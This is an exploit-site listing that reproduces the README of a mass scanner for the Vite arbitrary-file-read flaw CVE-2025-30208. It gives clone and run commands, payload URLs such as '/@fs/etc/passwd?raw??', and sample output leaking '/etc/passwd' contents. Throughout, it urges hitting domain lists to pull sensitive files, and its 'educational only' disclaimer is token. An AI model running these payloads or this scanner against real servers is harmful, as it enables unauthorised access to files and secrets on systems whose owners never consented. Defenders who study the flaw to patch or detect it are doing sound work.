Exploit for CVE-2025-30208

Name: Exploit for CVE-2025-30208
Rating: 5 (100 reviews)
2025-03-28 | CVSS 5.3
## https://sploitus.com/exploit?id=BD159DC1-A74E-50C7-9423-C6ADED4FC5D9
# CVE-2025-30208-ViteVulnScanner

Yo, this is a dope multi-threaded Python script by [keklick1337](https://github.com/keklick1337) to hunt down domains vulnerable to CVE-2025-30208 in Vite. Basically, it checks if you can snag random files via the `@fs` endpoint with `?raw??` or `?import&raw??` — think `/etc/passwd` leaks and other juicy shit. It’s got some smart false-positive filtering so you don’t waste time on crap, plus options to tweak how it spits out the results.

## What’s It Got?
- **Multi-threading**: Hammers through domain lists fast as fuck.
- **Protocol Flex**: Pick HTTP, HTTPS, or let it rip on both.
- **False-Positive Killer**: 
  - Checks a bullshit path to see if the server’s just trolling with 200 OK and HTML.
  - Ditches responses with `<head>` and `<body>` unless it smells legit.
- **Vuln Vibes**: Spots `sourcemappingurl` or `export default` to confirm the good stuff.
- **Output Choices**: 
  - Text files (`results_good.txt`, `results_maybe_good.txt`, `results_bad.txt`).
  - JSONL for the nerds who love details.
  - Toss in URLs with `-u` if you’re into that.
- **Console Spam**: Logs everything so you know what’s up.

## What You Need
- Python 3.6+ (older shit won’t cut it).
- Stuff to install:
  - `requests`
  - `urllib3`

## How to Get It Running
1. Grab it from GitHub:
   ```bash
   git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
   cd CVE-2025-30208-ViteVulnScanner
   ```
2. Install the dependencies (if you ain’t got ‘em already):
   ```bash
   pip install requests urllib3
   ```
3. Set up your files:
   - `path_list.txt`: Paths to check, one per line (e.g., `/etc/passwd`).
   - `domains.txt`: Domains to hit, one per line (e.g., `example.com`).

## How to Use It
Fire it up like this:

```bash
python3 CVE-2025-30208.py <domains_file> [options]
```

### Options, Bro
- `<domains_file>`: Your domains list (no file, no scan, duh).
- `-t, --threads`: How many threads to unleash (default: 10).
- `-p, --protocol`: Force `http` or `https`, or skip it for both.
- `-u, --urls`: Slap vulnerable URLs into the output.
- `-o, --output`: Base name for files (default: `results`).
- `-f, --format`: `txt` for split files or `jsonl` for one big-ass file (default: `txt`).

### Examples
1. Basic run, chill settings:
   ```bash
   python3 CVE-2025-30208.py domains.txt
   ```
2. Go hard with 20 threads, URLs, and JSONL:
   ```bash
   python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
   ```
3. 5 threads, HTTPS only, text vibes:
   ```bash
   python3 CVE-2025-30208.py domains.txt -t 5 -p https
   ```

## What You Get
### Text Mode (`-f txt`)
- `results_good.txt`: Shit that’s definitely fucked (has `sourcemappingurl` or `export default`).
- `results_maybe_good.txt`: Could be vuln, but no smoking gun.
- `results_bad.txt`: Clean, no worries.
- Add `-u` and URLs get tacked on with a tab (`\t`).

#### Sample `results_good.txt` with `-u`:
```
example.com    https://example.com/@fs/etc/passwd?raw??
```

### JSONL Mode (`-f jsonl`)
- Files: `results_good.jsonl`, `results_maybe_good.jsonl`, `results_bad.jsonl`.
- Each line’s a JSON with:
  - `domain`: What you scanned.
  - `status`: `VULNERABLE`, `MAYBE VULNERABLE`, or `BAD`.
  - `url` (if `-u`): Where it’s fucked.
  - `response`: What the server coughed up.

#### Sample `results_good.jsonl`:
```json
{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
```

## How It Rolls
1. **False-Positive Check**: 
   - Hits a fake path (`/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake`).
   - If it’s 200 OK with `<head>` and `<body>`, it’s a nope — server’s just being a dick.
2. **Vuln Hunt**:
   - Tries every path in `path_list.txt` with `@fs/<path>?raw??` and `?import&raw??`.
   - 200 OK? 
     - HTML with `<head>` and `<body>`? Skip that shit.
     - `sourcemappingurl` or `export default`? Boom, `GOOD`.
     - Just 200? `MAYBE_GOOD`.
   - No 200? `BAD`.
3. **Output**: Dumps it all where you told it to.

## Heads-Up
- SSL warnings are off (`urllib3.disable_warnings()`), so it doesn’t bitch about certs. Careful out there.
- Tweak `path_list.txt` for your targets — sensitive files are the real deal.
- False-positive filter assumes HTML means safe. If that’s bullshit for your setup, change it.

## Disclaimer
Listen up: this shit’s for educational purposes only, fam. I ain’t responsible if you fuck something up, get caught, or piss someone off with this. Use it to learn, not to be a dickhead. All risks are on you, nahuy — I’m just here dropping code.

## Who’s Behind It
- GitHub: [keklick1337](https://github.com/keklick1337) — that’s me, yo.

## Wanna Help?
Got ideas? Found a bug? Hit me up with issues or pull requests. More ways to kill false positives or dope features? Let’s make this beast even sicker.